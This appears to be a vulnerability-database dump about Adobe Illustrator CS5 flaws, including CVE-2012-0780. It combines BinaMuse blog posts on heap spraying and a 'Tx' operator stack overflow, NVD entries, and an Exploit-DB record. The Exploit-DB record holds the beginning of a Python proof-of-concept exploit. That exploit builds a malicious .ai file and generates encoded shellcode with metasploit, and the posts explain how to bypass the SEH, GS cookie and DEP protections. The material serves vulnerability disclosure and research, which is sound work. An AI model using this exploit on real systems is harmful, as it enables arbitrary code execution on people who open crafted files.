**always reusing recurrent chunks**. The resulting .ai [file](<https://sites.google.com/a/binamuse.com/home/aihs300M.ai>) is a 300M memory spraying PDF/AI file that only weights ~500k. As the size is already reasonable we have ignored this but bear in mind that other partitions of the original private data can easily provide better compression than the trivial one. \n\n\n### \n\n### The python script\n\n[This](<https://sites.google.com/a/binamuse.com/home/IllustratorHS.py>) python script used to construct this heap spraying files . It's easily configurable from the command line. \n\n\n> $ python IllustratorHS.py --help \nUsage: IllustratorHS.py [options] \nAdobe Illustrator HeapSpray PoC \nOptions: \n -h, --help show this help message and exit \n \\--verbose For debugging \n \\--doc Print detailed documentation \n \\--size=size Size in megabytes to spray. (300M spray means 500k file) \n \\--chunk=chunk File containing the data to spray. Shall be less than 0x1000 \n bytes, and it will be padded to that size. The default is to \n spray with a lot of \"X\"\n\nThe default action is to output an \"X\" heap spraying .ai file to stdout. The resultant file will fill 300 megabytes of memory with the character 'X'. The script will construct the image so the the 0x1000 bytes chunk is repeated several times until it fills each megabyte. It also will play well with the 0x80 bytes of metadata so we can predict with great deal of probability what is under a selected address like 0x18EB0090. \n \n\n\n### The running example\n\nHere there is a screenshot of Adobe Illustrator under the debugger when sprayed. Note the are several 0x10000000 sized memory maps. Any nice OS would try to put each map consecutive to the previous to prevent fragmentation. Where the OS will accommodate the pack of 300 different 1Megabyte maps is the only source of unreliability. \n\n\n[](<http://3.bp.blogspot.com/-0scV_pEL0dY/T7aDc6EP0KI/AAAAAAAAACc/p_c8OxwBv3U/s1600/AISprayedX.png>)\n\nAt 0x18EB0090 there is the 0x90th byte of the 0x1000 bytes chunk. _Question: Does the address 0x18EB0000 have the same chance than 0x18EB0090 of being controlled?_\n\n_ \n_", "modified": "2013-01-09T04:33:45", "published": "2012-05-09T13:04:00", "id": "BINAMUSE:5588A429F57C38D32E98FF3D5E263D51", "href": "http://blog.binamuse.com/2012/05/1st.html", "type": "binamuse", "title": "Heap spraying Adobe Illustrator", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-29T13:19:49", "bulletinFamily": "info", "description": "[](<http://1.bp.blogspot.com/-SoNEWm58EUo/T7zwhM9H5yI/AAAAAAAAADE/-TRTXTnQz_w/s1600/adobe_illustrator_cs5.png>)\n\n**Product:** Adobe Illustrator CS5 Version: 15.0.2 \n**Binary affected:** Illustrator.exe [98bce5a36f3d6a0b34507d5d9921b257] \n**CVSS v2 Base Score:**10.0 (HIGH) \n**Impact Subscore:** 10.0 \n**Exploitability Subscore:** 10.0 \n\n\n**CVE:** 2012-0780 \n**BID:** 53422\n\n \n\n\n \n\n\n### Description\n\n> _A stack based overflow on the graphic operator 'Tx'._\n\nAdobe Illustrator is a vector graphics editor developed and marketed by Adobe Systems. The issue explained here affects Illustrator CS5 15.0.2 (CS5.5/CS5/CS4) for both Mac and Windows; other versions may also be affected. This corresponds to [CVE-2012-0780](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0780>), [BID-53422](<http://www.securityfocus.com/bid/53422>) and to [apsb12-10](<http://www.adobe.com/support/security/bulletins/apsb12-10.html>)\n\n \n \n\n\nHistorically Illustrator seems to base its primary file format in a well structured pseudo postscript file as outlined [here](<http://partners.adobe.com/public/developer/en/illustrator/sdk/AI7FileFormat.pdf>). This format contains a series of graphic operators that describe the vector graphic, including lines, paths, raster images and text among others. Illustrator fails to check the boundaries of a buffer when parsing a string parameter of the text printing operator 'Tx'. \n\nFor example consider the following postscript statement:\n\n \n\n\n> (The string) Tx\n\n \n\n\nIf more than 256 bytes are passed to the operator Tx there is a **stack based overflow**. \"The string\" can be encoded in hex or octal notation and is able to contain null characters. \n \n\n\n[](<http://3.bp.blogspot.com/-zdiLCMA0rxc/T8-n5Eik33I/AAAAAAAAADc/1fsGLAOlQ5s/s1600/debugcrash.png>)\n\n \nThe debugging example of the crashing .ai file is provided [here](<https://sites.google.com/a/binamuse.com/home/debug.ai>). this hits the end of the stack writing the character \"A\".\n\n### Exploitation\n\nIn windows this occurs at the function 0x004A7200 (Note that Illustrator.exe is based at 0x400000 ). The local buffer is /GS-cookie protected and the stack usually* has ~0x3000 bytes from the beginning of the buffer until the very beginning of the stack. \n\n \n\n\nIn very few words the overflowing function does this (under overflowing condition):\n\n 1. reserves 256+ bytes in the stack for a buffer and other local variables\n 2. write arbitrary amount of arbitrary data read from the file to the stack buffer\n 3. translate every character using a provided map (e.g. \\x90->\\x00)\n 4. due to some stack variable overwrite we control the destination address and size where the function is ought to copy the translated string\n 5. at pc=004A72C6 it copies our buffer to an arbitrary location (read from the overwritten stack) until the first null character\n\n \n\n\nWe 'need' to trigger an exception or otherwise control the execution flow before the GS cookie is checked. For this there are (at least) two possibilities: \n\n a. At state (2) exhaust the stack memory and sigsegv at the beginning of it or \n\n b. at state (4) write to an invalid location. \n\n \n\n\nLet's analize the second option to generate an exception so less stack gets corrupted with the overflowed buffer. When reading the buffer, the stack has this look:\n\n \n\n\n[](<http://1.bp.blogspot.com/-wijrcGaKbfk/T8-QpviAStI/AAAAAAAAADQ/WvU7n05sdmQ/s1600/stack01.png>)\n\n \n\n\nNote that in Win7 there weren't found any fixed no safeseh-protected memory maps _already loaded_ so the only option left is to point the seh handler to a non module related memory map. \n\n> _ ```Also an interesting technique to bypass DEP most of the times could be to overwrite the security_cookie wich is always at 0xFB3380 with the arbitrary write primitive, *guess* the EBP and go for the direct ret address overwrite.```_\n\nWe use the arbitrary write primitive pointed out earlier to put some controlled data at a known address and also to trigger an exception. To do so we write to the end of the a fixed writable map that doesn't belong to any module, say the memory at 0x10000 (This is also possible using a sprayed memory map (see below)). Basically we write a small bit of ASCII assembler to the end of the environment variables map and keep going until it the memory map end is reached, raising an exception. Then as we have overwriting the seh handler and we can not jump to any safeseh protected module we jump to the recently written memory. At which point it jumps back to the stack and executes the calcuatorrrrrr.\n\n> _```No DEP on Windows7 and XPSP3 with default installation```_\n\n### One .ai to rule them all\n\nJust for the fun of it, let's investigate the possibility of making a one file to exploit all versions and operating systems combinations available. Illustrator runs in Windows and OSX always as a 32 bit only process.\n\n \n\n\nInspecting the crash in the OSX/Leopard version we have found that there is no canary or any compiler aided check for stack overflow, it is a simple return address overwrite. Also the offset from where the return address is taken in OSX is different from the offset from where the SEH handler pointer is taken in Windows. This makes it possible for both exploits to coexist; we can jump to different addresses in different platforms using the same file. \n \nAlso we spray both the OSX and W32 shellcode several times on the memory. Both versions of the shellcode will be at the same time on the memory no matter in which platform is being exploited. For more info about how to spray an Illustrator process memory check our [previous blog post](<http://blog.binamuse.com/2012/05/1st.html>). \n \nNow it is only a matter of pointing the correct stack offset to the corresponding shellcode. \n \nIn Windows the overwritten seh handler points to the windows version of the shellcode and in OSX as there isn't any stack canary, the overwriten return address point to a different heap memory where the OSX shellcode is placed. \n \n\n\n> _As the offset of the osx-ret and the windows-seh-handler are different and compatible both versions could coexist in a single exploit file._\n\n \n\n\n### The vulnerable function follows...\n\n \n\n\n.text:004A7200 ; =============== S U B R O U T I N E =======================================\n\n.text:004A7200\n\n.text:004A7200 ; Attributes: bp-based frame\n\n.text:004A7200\n\n.text:004A7200 sub_4A7200 proc near \n\n.text:004A7200\n\n.text:004A7200 var_11C = dword ptr -11Ch\n\n.text:004A7200 var_118 = dword ptr -118h\n\n.text:004A7200 var_114 = byte ptr -114h\n\n.text:004A7200 var_14 = dword ptr -14h\n\n.text:004A7200 var_10 = dword ptr -10h\n\n.text:004A7200 var_C = dword ptr -0Ch\n\n.text:004A7200 var_4 = dword ptr -4\n\n.text:004A7200 arg_0 = dword ptr 8\n\n.text:004A7200\n\n.text:004A7200 push ebp\n\n.text:004A7201 mov ebp, esp\n\n.text:004A7203 push 0FFFFFFFFh\n\n.text:004A7205 push offset loc_C3B8C0\n\n.text:004A720A mov eax, large fs:0\n\n.text:004A7210 push eax\n\n.text:004A7211 sub esp, 110h ;Make room for a 256 bytes buffer, etc \n\n.text:004A7217 mov eax, dword_FB3380 \n\n.text:004A721C xor eax, ebp\n\n.text:004A721E mov [ebp+var_14], eax ;Cookie! Immediately after the buffer\n\n.text:004A7221 push ebx\n\n.text:004A7222 push esi\n\n.text:004A7223 push edi\n\n.text:004A7224 push eax\n\n.text:004A7225 lea eax, [ebp+var_C]\n\n.text:004A7228 mov large fs:0, eax\n\n.text:004A722E mov [ebp+var_10], esp\n\n.text:004A7231 mov ebx, [ebp+arg_0]\n\n.text:004A7234 mov edi, ecx\n\n.text:004A7236 mov ecx, ebx\n\n.text:004A7238 mov [ebp+var_118], ebx\n\n.text:004A723E call std::basic_string::length(...) ;Original size offending size\n\n ;(It doesn;t stop at null chars)\n\n.text:004A7244 mov esi, eax\n\n.text:004A7246 push esi\n\n.text:004A7247 mov ecx, ebx\n\n.text:004A7249 call std::basic_string::c_str(...)\n\n.text:004A724F push eax\n\n.text:004A7250 lea eax, [ebp+var_114]\n\n.text:004A7256 push eax\n\n.text:004A7257 call memcpy ;STACK OVERFLOW! (If more than 256 bytes)\n\n.text:004A725C lea eax, [ebp+esi+var_114]\n\n.text:004A7263 add esp, 0Ch\n\n.text:004A7266 mov [ebp+var_11C], eax\n\n.text:004A726C mov byte ptr [eax], 0\n\n.text:004A726F mov [ebp+var_4], 0\n\n.text:004A7276 lea esi, [ebp+var_114]\n\n.text:004A727C lea esp, [esp+0]\n\n.text:004A7280\n\n.text:004A7280 loc_4A7280: \n\n.text:004A7280 cmp esi, eax\n\n.text:004A7282 jnb short loc_4A72B6\n\n.text:004A7284 mov edx, [edi]\n\n.text:004A7286 mov eax, [edx+4]\n\n.text:004A7289 push esi\n\n.text:004A728A mov ecx, edi\n\n.text:004A728C call eax ;Iterates over the stack copied buffer\n\n ;applying a 'locale'? character translation\n\n ;(Invalid chars noted in exploit)\n\n.text:004A728E test eax, eax\n\n.text:004A7290 jg short loc_4A7297\n\n.text:004A7292 mov eax, 1\n\n.text:004A7297\n\n.text:004A7297 loc_4A7297: \n\n.text:004A7297 add esi, eax\n\n.text:004A7299 mov eax, [ebp+var_11C]\n\n.text:004A729F jmp short loc_4A7280\n\n.text:004A72AE ; ---------------------------------------------------------------------------\n\n.text:004A72AE\n\n.text:004A72AE loc_4A72AE: \n\n.text:004A72AE mov ebx, [ebp+var_118]\n\n.text:004A72B4 jmp short loc_4A72BD\n\n.text:004A72B6 ; ---------------------------------------------------------------------------\n\n.text:004A72B6\n\n.text:004A72B6 loc_4A72B6: \n\n.text:004A72B6 mov [ebp+var_4], 0FFFFFFFFh\n\n.text:004A72BD\n\n.text:004A72BD loc_4A72BD: \n\n.text:004A72BD lea ecx, [ebp+var_114]\n\n.text:004A72C3 push ecx\n\n.text:004A72C4 mov ecx, ebx\n\n.text:004A72C6 call std::basic_string::operator=(...) ;Here, due to local values \n\n ;corruption it is possible to\n\n ;write a translated version of\n\n ;our buffer to anywhere \n\n.text:004A72CC mov ecx, [ebp+var_C]\n\n.text:004A72CF mov large fs:0, ecx\n\n.text:004A72D6 pop ecx\n\n.text:004A72D7 pop edi\n\n.text:004A72D8 pop esi\n\n.text:004A72D9 pop ebx\n\n.text:004A72DA mov ecx, [ebp+var_14]\n\n.text:004A72DD xor ecx, ebp\n\n.text:004A72DF call sub_C27512 ;Check the cookie\n\n.text:004A72E4 mov esp, ebp\n\n.text:004A72E6 pop ebp\n\n.text:004A72E7 retn 4\n\n.text:004A72E7 sub_4A7200 endp\n\n.text:004A72E7", "modified": "2013-04-09T22:09:43", "published": "2012-06-06T20:24:00", "id": "BINAMUSE:28E11A73F405856E315AEF651E2CAE96", "href": "http://blog.binamuse.com/2012/06/adobe-illustrator-tx-operator-remote.html", "type": "binamuse", "title": "Adobe Illustrator Tx operator Remote Buffer Overflow - CVE-2012-0780", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2017-08-29T12:17:37", "bulletinFamily": "NVD", "description": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0780, CVE-2012-2024, CVE-2012-2025, and CVE-2012-2026.", "modified": "2017-08-28T21:31:27", "published": "2012-05-09T00:36:39", "id": "CVE-2012-2023", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2023", "title": "CVE-2012-2023", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T12:17:37", "bulletinFamily": "NVD", "description": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0780, CVE-2012-2023, CVE-2012-2024, and CVE-2012-2025.", "modified": "2017-08-28T21:31:27", "published": "2012-05-09T00:36:40", "id": "CVE-2012-2026", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2026", "title": "CVE-2012-2026", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T12:17:37", "bulletinFamily": "NVD", "description": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0780, CVE-2012-2023, CVE-2012-2025, and CVE-2012-2026.", "modified": "2017-08-28T21:31:27", "published": "2012-05-09T00:36:39", "id": "CVE-2012-2024", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2024", "title": "CVE-2012-2024", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T12:17:37", "bulletinFamily": "NVD", "description": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0780, CVE-2012-2023, CVE-2012-2024, and CVE-2012-2026.", "modified": "2017-08-28T21:31:27", "published": "2012-05-09T00:36:39", "id": "CVE-2012-2025", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2025", "title": "CVE-2012-2025", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-05T11:40:18", "bulletinFamily": "NVD", "description": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2023, CVE-2012-2024, CVE-2012-2025, and CVE-2012-2026.", "modified": "2017-12-04T21:29:03", "published": "2012-05-09T00:36:39", "id": "CVE-2012-0780", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0780", "title": "CVE-2012-0780", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T11:09:51", "bulletinFamily": "exploit", "description": "Adobe Illustrator CS5.5 Memory Corruption Exploit. CVE-2012-0780. Local exploits for multiple platform", "modified": "2012-06-14T00:00:00", "published": "2012-06-14T00:00:00", "id": "EDB-ID:19139", "href": "https://www.exploit-db.com/exploits/19139/", "type": "exploitdb", "title": "Adobe Illustrator CS5.5 Memory Corruption Exploit", "sourceData": "##########################################################################\r\n#### Felipe Andres Manzano * felipe.andres.manzano@gmail.com ####\r\n##########################################################################\r\n'''\r\nThe vulnerable function follows...\r\n----------------------------------\r\n.text:004A7200 ; =============== S U B R O U T I N E =======================================\r\n.text:004A7200\r\n.text:004A7200 ; Attributes: bp-based frame\r\n.text:004A7200\r\n.text:004A7200 sub_4A7200 proc near \r\n.text:004A7200\r\n.text:004A7200 var_11C = dword ptr -11Ch\r\n.text:004A7200 var_118 = dword ptr -118h\r\n.text:004A7200 var_114 = byte ptr -114h\r\n.text:004A7200 var_14 = dword ptr -14h\r\n.text:004A7200 var_10 = dword ptr -10h\r\n.text:004A7200 var_C = dword ptr -0Ch\r\n.text:004A7200 var_4 = dword ptr -4\r\n.text:004A7200 arg_0 = dword ptr 8\r\n.text:004A7200\r\n.text:004A7200 push ebp\r\n.text:004A7201 mov ebp, esp\r\n.text:004A7203 push 0FFFFFFFFh\r\n.text:004A7205 push offset loc_C3B8C0\r\n.text:004A720A mov eax, large fs:0\r\n.text:004A7210 push eax\r\n.text:004A7211 sub esp, 110h ;Make room for a 256 bytes buffer, etc \r\n.text:004A7217 mov eax, dword_FB3380 \r\n.text:004A721C xor eax, ebp\r\n.text:004A721E mov [ebp+var_14], eax ;Cookie! Immediately after the buffer\r\n.text:004A7221 push ebx\r\n.text:004A7222 push esi\r\n.text:004A7223 push edi\r\n.text:004A7224 push eax\r\n.text:004A7225 lea eax, [ebp+var_C]\r\n.text:004A7228 mov large fs:0, eax\r\n.text:004A722E mov [ebp+var_10], esp\r\n.text:004A7231 mov ebx, [ebp+arg_0]\r\n.text:004A7234 mov edi, ecx\r\n.text:004A7236 mov ecx, ebx\r\n.text:004A7238 mov [ebp+var_118], ebx\r\n.text:004A723E call std::basic_string::length(...) ;Original size offending size\r\n ;(It doesn;t stop at null chars)\r\n.text:004A7244 mov esi, eax\r\n.text:004A7246 push esi\r\n.text:004A7247 mov ecx, ebx\r\n.text:004A7249 call std::basic_string::c_str(...)\r\n.text:004A724F push eax\r\n.text:004A7250 lea eax, [ebp+var_114]\r\n.text:004A7256 push eax\r\n.text:004A7257 call memcpy ;STACK OVERFLOW! (If more than 256 bytes)\r\n.text:004A725C lea eax, [ebp+esi+var_114]\r\n.text:004A7263 add esp, 0Ch\r\n.text:004A7266 mov [ebp+var_11C], eax\r\n.text:004A726C mov byte ptr [eax], 0\r\n.text:004A726F mov [ebp+var_4], 0\r\n.text:004A7276 lea esi, [ebp+var_114]\r\n.text:004A727C lea esp, [esp+0]\r\n.text:004A7280\r\n.text:004A7280 loc_4A7280: \r\n.text:004A7280 cmp esi, eax\r\n.text:004A7282 jnb short loc_4A72B6\r\n.text:004A7284 mov edx, [edi]\r\n.text:004A7286 mov eax, [edx+4]\r\n.text:004A7289 push esi\r\n.text:004A728A mov ecx, edi\r\n.text:004A728C call eax ;Iterates over the stack copied buffer\r\n ;applying a 'locale'? character translation\r\n ;(Invalid chars noted in exploit)\r\n.text:004A728E test eax, eax\r\n.text:004A7290 jg short loc_4A7297\r\n.text:004A7292 mov eax, 1\r\n.text:004A7297\r\n.text:004A7297 loc_4A7297: \r\n.text:004A7297 add esi, eax\r\n.text:004A7299 mov eax, [ebp+var_11C]\r\n.text:004A729F jmp short loc_4A7280\r\n.text:004A72AE ; ---------------------------------------------------------------------------\r\n.text:004A72AE\r\n.text:004A72AE loc_4A72AE: \r\n.text:004A72AE mov ebx, [ebp+var_118]\r\n.text:004A72B4 jmp short loc_4A72BD\r\n.text:004A72B6 ; ---------------------------------------------------------------------------\r\n.text:004A72B6\r\n.text:004A72B6 loc_4A72B6: \r\n.text:004A72B6 mov [ebp+var_4], 0FFFFFFFFh\r\n.text:004A72BD\r\n.text:004A72BD loc_4A72BD: \r\n.text:004A72BD lea ecx, [ebp+var_114]\r\n.text:004A72C3 push ecx\r\n.text:004A72C4 mov ecx, ebx\r\n.text:004A72C6 call std::basic_string::operator=(...) ;Here, due to local values \r\n ;corruption it is possible to\r\n ;write a translated version of\r\n ;our buffer to anywhere \r\n.text:004A72CC mov ecx, [ebp+var_C]\r\n.text:004A72CF mov large fs:0, ecx\r\n.text:004A72D6 pop ecx\r\n.text:004A72D7 pop edi\r\n.text:004A72D8 pop esi\r\n.text:004A72D9 pop ebx\r\n.text:004A72DA mov ecx, [ebp+var_14]\r\n.text:004A72DD xor ecx, ebp\r\n.text:004A72DF call sub_C27512 ;Check the cookie\r\n.text:004A72E4 mov esp, ebp\r\n.text:004A72E6 pop ebp\r\n.text:004A72E7 retn 4\r\n.text:004A72E7 sub_4A7200 endp\r\n.text:004A72E7\r\n\r\n\r\nf/\r\n'''\r\n\r\n#Exploit PoC begins...\r\nfrom miniPDF import * #http://pastebin.com/LUTXSSvV\r\nimport zlib,struct,os,optparse,hashlib\r\nfrom subprocess import Popen, PIPE\r\n#Character translation map for the copied buffer (Reversed from function 004A72F0)\r\ncmap=[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x20,0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28,0x29,0x2A,0x2B,0x2C,0x2D,0x2E,0x2F,\r\n0x30,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3A,0x3B,0x3C,0x3D,0x3E,0x3F,\r\n0x40,0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,\r\n0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,0x5B,0x5C,0x5D,0x5E,0x5F,\r\n0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6C,0x6D,0x6E,0x6F,\r\n0x70,0x71,0x72,0x73,0x74,0x75,0x76,0x77,0x78,0x79,0x7A,0x7B,0x7C,0x7D,0x7E,0x00,\r\n0x80,0x00,0x82,0x83,0x84,0x85,0x86,0x87,0x88,0x89,0x8A,0x8B,0x8C,0x00,0x00,0x00,\r\n0x00,0x91,0x92,0x93,0x94,0x95,0x96,0x97,0x98,0x99,0x9A,0x9B,0x9C,0x00,0x00,0x9F,\r\n0x20,0xA1,0xA2,0xA3,0xA4,0xA5,0xA6,0xA7,0xA8,0xA9,0xAA,0xAB,0xAC,0x2D,0xAE,0xAF,\r\n0xB0,0xB1,0xB2,0xB3,0xB4,0xB5,0xB6,0xB7,0xB8,0xB9,0xBA,0xBB,0xBC,0xBD,0xBE,0xBF,\r\n0xC0,0xC1,0xC2,0xC3,0xC4,0xC5,0xC6,0xC7,0xC8,0xC9,0xCA,0xCB,0xCC,0xCD,0xCE,0xCF,\r\n0xD0,0xD1,0xD2,0xD3,0xD4,0xD5,0xD6,0xD7,0xD8,0xD9,0xDA,0xDB,0xDC,0xDD,0xDE,0xDF,\r\n0xE0,0xE1,0xE2,0xE3,0xE4,0xE5,0xE6,0xE7,0xE8,0xE9,0xEA,0xEB,0xEC,0xED,0xEE,0xEF,\r\n0xF0,0xF1,0xF2,0xF3,0xF4,0xF5,0xF6,0xF7,0xF8,0xF9,0xFA,0xFB,0xFC,0xFD,0xFE,0xFF]\r\ninvalid = [ i for i in xrange(0,0xff+1) if cmap[i] != i and i>0x1f]\r\n\r\n\r\ndef getXImage(width, height, fill='\\x90', tail='\\xcc'):\r\n '''\r\n [ a b c d tx ty ] llx lly urx ury h w bits ImageType AlphaChannelCount reserved bin-ascii ImageMask XI\r\n Arguments to the XI operator specify the location and size of the image, its\r\n pixel bit depth, color type, and other attributes\r\n\r\n The image matrix maps the unit square of user space, bounded by\r\n (0, 0) and (1, 1) in user space, to the boundary of the source image in\r\n image space.\r\n '''\r\n\r\n doc = '''0 A\r\nu\r\n0 O\r\n0 g\r\n0 J 0 j 1 w 10 M []0 d\r\n0 XR\r\n%AI5_File:\r\n%AI5_BeginRaster\r\n[$width$ 0 0 $height$ 0 0] 0 0 $width$ $height$ $width$ $height$ 8 1 0 0 $bin_ascii$ 0\r\n%%BeginData: $size$\r\nXI\r\n$data$\r\n%%EndData\r\nXH\r\n%AI5_EndRaster\r\nF\r\nU\r\n'''\r\n bin_ascii = 1 #binary\r\n doc = doc.replace('$width$','%d'%width)\r\n doc = doc.replace('$height$','%d'%height)\r\n doc = doc.replace('$bin_ascii$','%d'%bin_ascii)\r\n doc = doc.replace('$size$','%d'%(width*height))\r\n \r\n data = (fill*(width*height))\r\n data = data[:width*height-len(tail)]+tail\r\n\r\n if bin_ascii == 0:\r\n data = data.encode('hex')\r\n data_formated = ''\r\n for i in xrange(0,len(data)+62,62):\r\n data_formated += '%'+data[i:i+62]+'\\n'\r\n data = data_formated\r\n doc = doc.replace('$data$',data)\r\n return doc\r\n\r\ndef makeASCIICode(msfpayload):\r\n msfpayload = Popen('msfpayload3.5 %s R'%msfpayload, shell=True, stdout=PIPE)\r\n msfencode = Popen(\"msfencode3.5 BufferRegister=EAX -e x86/alpha_mixed -b '%s' -t raw\"%''.join(['\\\\x%02x'%x for x in invalid]), \r\n shell=True, \r\n stdin=msfpayload.stdout, \r\n stdout=PIPE)\r\n code = msfencode.communicate()[0]\r\n return code\r\n \r\ndef mkAIPrivate(options):\r\n baseai = '''\r\n%!PS-Adobe-3.0 \r\n%%Creator: Adobe Illustrator(TM) 3.2\r\n%%AI8_CreatorVersion: 15.0.2\r\n%AI5_FileFormat 11.0\r\n%%For: (Administrator) ()\r\n%%Title: (thafile.ai)\r\n%%CreationDate: 1/21/2011 12:32 PM\r\n%%Canvassize: 16383\r\n%%BoundingBox: 29 -389 198 75\r\n%%DocumentProcessColors: Black\r\n%%DocumentFonts: MyriadPro-Regular\r\n%%DocumentNeededFonts: MyriadPro-Regular\r\n%%DocumentNeededResources: procset Adobe_packedarray 2.0 0\r\n%%+ procset Adobe_cshow 1.1 0\r\n%%+ procset Adobe_customcolor 1.0 0\r\n%%+ procset Adobe_typography_AI3 1.0 1\r\n%%+ procset Adobe_pattern_AI3 1.0 0\r\n%%+ procset Adobe_Illustrator_AI3 1.0 1\r\n%AI3_ColorUsage: Color\r\n%AI3_TemplateBox: 298 -421 298 -421\r\n%AI3_TileBox: -8.35986 -816.9453 603.6406 -24.9448\r\n%AI3_DocumentPreview: None\r\n%%PageOrigin:-8 -817\r\n%AI7_GridSettings: 72 8 72 8 1 0 0.8 0.8 0.8 0.9 0.9 0.9\r\n%AI9_Flatten: 1\r\n%AI12_CMSettings: 00.MS\r\n%%EndComments\r\n%%BeginProlog\r\n%%IncludeResource: procset Adobe_packedarray 2.0 0\r\nAdobe_packedarray /initialize get exec\r\n%%IncludeResource: procset Adobe_cshow 1.1 0\r\n%%IncludeResource: procset Adobe_customcolor 1.0 0\r\n%%IncludeResource: procset Adobe_typography_AI3 1.0 1\r\n%%IncludeResource: procset Adobe_pattern_AI3 1.0 0\r\n%%IncludeResource: procset Adobe_Illustrator_AI3 1.0 1\r\n%%EndProlog\r\n%%BeginSetup\r\n%%IncludeFont: MyriadPro-Regular\r\nAdobe_cshow /initialize get exec\r\nAdobe_customcolor /initialize get exec\r\nAdobe_typography_AI3 /initialize get exec\r\nAdobe_pattern_AI3 /initialize get exec\r\nAdobe_Illustrator_AI3 /initialize get exec\r\n[\r\n39/quotesingle 96/grave 128/Euro 130/quotesinglbase/florin/quotedblbase/ellipsis\r\n/dagger/daggerdbl/circumflex/perthousand/Scaron/guilsinglleft/OE 145/quoteleft\r\n/quoteright/quotedblleft/quotedblright/bullet/endash/emdash/tilde/trademark\r\n/scaron/guilsinglright/oe/dotlessi 159/Ydieresis /space 164/currency 166/brokenbar\r\n168/dieresis/copyright/ordfeminine 172/logicalnot/hyphen/registered/macron/ring\r\n/plusminus/twosuperior/threesuperior/acute/mu 183/periodcentered/cedilla\r\n/onesuperior/ordmasculine 188/onequarter/onehalf/threequarters 192/Agrave\r\n/Aacute/Acircumflex/Atilde/Adieresis/Aring/AE/Ccedilla/Egrave/Eacute\r\n/Ecircumflex/Edieresis/Igrave/Iacute/Icircumflex/Idieresis/Eth/Ntilde\r\n/Ograve/Oacute/Ocircumflex/Otilde/Odieresis/multiply/Oslash/Ugrave\r\n/Uacute/Ucircumflex/Udieresis/Yacute/Thorn/germandbls/agrave/aacute\r\n/acircumflex/atilde/adieresis/aring/ae/ccedilla/egrave/eacute/ecircumflex\r\n/edieresis/igrave/iacute/icircumflex/idieresis/eth/ntilde/ograve/oacute\r\n/ocircumflex/otilde/odieresis/divide/oslash/ugrave/uacute/ucircumflex\r\n/udieresis/yacute/thorn/ydieresis\r\nTE\r\n%AI3_BeginEncoding: _MyriadPro-Regular MyriadPro-Regular\r\n[/_MyriadPro-Regular/MyriadPro-Regular 0 0 1 TZ\r\n%AI3_EndEncoding AdobeType\r\n%%EndSetup\r\n$HEAPSPRAY$\r\nu\r\n0 To\r\n1 0 0 1 63.9058 -54.9058 0 Tp\r\nTP\r\n1 0 0 1 63.9058 -54.9058 Tm\r\n0 Tr\r\n0 O\r\n0 0 0 1 k\r\n4 M\r\n/_MyriadPro-Regular 12 Tf\r\n100 Tz\r\n0 Tt\r\n0 0 Tl\r\n0 Tc\r\n($PATTERN$) Tx 1 0 Tk\r\nTO\r\nU\r\n%%PageTrailer\r\ngsave annotatepage grestore showpage\r\n%%Trailer\r\nAdobe_Illustrator_AI3 /terminate get exec\r\nAdobe_pattern_AI3 /terminate get exec\r\nAdobe_typography_AI3 /terminate get exec\r\nAdobe_customcolor /terminate get exec\r\nAdobe_cshow /terminate get exec\r\nAdobe_packedarray /terminate get exec\r\n%%EOF\r\n'''\r\n\r\n\r\n #configure token and search code snipet\r\n token = 0x494c4546\r\n\r\n if options.w7:\r\n #Win7 In w7 the environment memory is 0x10000bytes long!\r\n msfpayload = 'windows/exec CMD=calc.exe EXITFUNC=process'\r\n baseai = baseai.replace('$HEAPSPRAY$','')\r\n jmp_addr = 0x00001FF01\r\n write_addr = 0x0001FF01\r\n elif options.xp:\r\n 